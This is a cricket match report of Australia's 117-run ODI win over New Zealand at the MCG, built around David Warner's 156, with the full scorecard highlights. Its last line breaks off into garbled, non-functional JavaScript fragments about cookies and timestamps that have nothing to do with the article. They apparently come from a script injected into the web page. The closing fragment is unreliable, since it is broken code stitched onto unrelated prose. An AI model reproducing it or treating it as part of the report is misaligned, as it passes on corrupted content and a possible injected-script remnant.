Australia has defeated New Zealand by 117 runs in the final ODI at the MCG on Friday night, to claim a 3-0 series win over the nation's Trans-Tasman rivals.

The win was set up by a brilliant century from David Warner, who lasted the entire innings, only to be run out on the final ball as the side went in search of quick fire, final over runs.

Warner blasted 156 runs from 128 deliveries in what was his second ton in as many matches.

Australia won the toss and elected to bat and was in trouble early at 2-11, with Finch (3) and Smith (0) both falling cheaply within the first four overs. Warner then produced one of his finest one-day international knocks, as he played a superbly controlled innings to rescue the Aussies, before hitting out in the final five to 10 overs.

Following the dismissals of Finch and Smith, George Bailey helped Warner steady the ship somewhat, before he was dismissed for 23. However, when Mitch Marsh fell for a duck in the same over, the hosts were in trouble once again at 4-73.

Travis Head (37) then continued his good form, as he and Warner put on a 105-run partnership, helping lay the platform for the Aussie opener to pile on the runs.

Matthew Wade (14) and James Faulkner (13) also chimed in with handy contributions towards the end of the innings, to help Australia reach 8-264 from 50 overs.

New Zealand started strongly in response, with Martin Guptill (34) and Tom Latham (28) looking in ominous form. However after the opening pair were dismissed, the remainder of the batting order showed little resistance, with Kane Williamson (13), Colin Munro (20), Colin de Grandhomme (11) and Mitchell Santner (15) the only other batsmen to reach double figures as the Black Caps were bowled out for just 147.

Mitchell Starc was the pick of the bowlers, finishing with figures of 3-34, while Pat Cummins, James Faulkner and Travis Head each claimed two wickets.

Australia's next international fixture begins on Thursday, when the Test side take on Pakistan in the first Test at the Gabba. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
